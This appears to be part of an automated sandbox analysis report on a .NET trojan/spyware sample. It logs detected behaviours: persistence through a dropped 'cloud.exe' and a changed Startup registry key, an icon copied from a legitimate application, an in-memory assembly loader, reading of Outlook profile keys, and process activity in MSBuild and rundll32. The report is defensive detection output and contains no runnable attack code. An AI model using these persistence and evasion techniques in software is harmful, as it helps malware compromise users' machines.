                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AdobeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bowcreia.2it.ps1Jump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/8@18/16
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_01
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: *.sln
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                Source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.389276062.0000000000EE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.386822376.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.488819877.000000000422D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.485902320.0000000004090000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.389276062.0000000000EE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.386822376.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000007.00000003.488819877.000000000422D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.485902320.0000000004090000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4637bd0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4457b50.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4477b70.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.44b7b90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.32b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4637bd0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.32b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4477b70.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4457b50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.44b7b90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.303083113.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.389628411.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.303493629.0000000004637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.389107599.00000000032B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe PID: 1724, type: MEMORYSTR
                .NET source code contains potential unpacker
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, WindowsFormsApp86/Rain.cs.Net Code: Grass System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: cloud.exe.0.dr, WindowsFormsApp86/Rain.cs.Net Code: Grass System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.d40000.0.unpack, WindowsFormsApp86/Rain.cs.Net Code: Grass System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018161EB push ecx; iretd 0_2_018161EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010FD0D1 push ecx; ret 3_2_010FD0E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041167F push ebp; ret 3_2_00411680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004106D0 push D7B7C7D8h; retf 3_2_004106D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041175B push ss; retf 3_2_0041175C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040F77F push ds; ret 3_2_0040F783
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0443D0D1 push ecx; ret 7_2_0443D0E4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029BD98C push ds; ret 7_2_029BD990
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CE9B5 push ss; retf 7_2_029CE9BC
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: 0x97935090 [Tue Aug 2 00:47:12 2050 UTC]
                Source: initial sampleStatic PE information: section name: .text entropy: 7.804027408754121
                Source: initial sampleStatic PE information: section name: .text entropy: 7.804027408754121

                Persistence and Installation Behavior

                barindex
                Drops executable to a common third party application directory
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeJump to dropped file

                Boot Survival

                barindex
                Creates an undocumented autostart registry key
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AdobeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe\:Zone.Identifier:$DATAJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (91).png
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
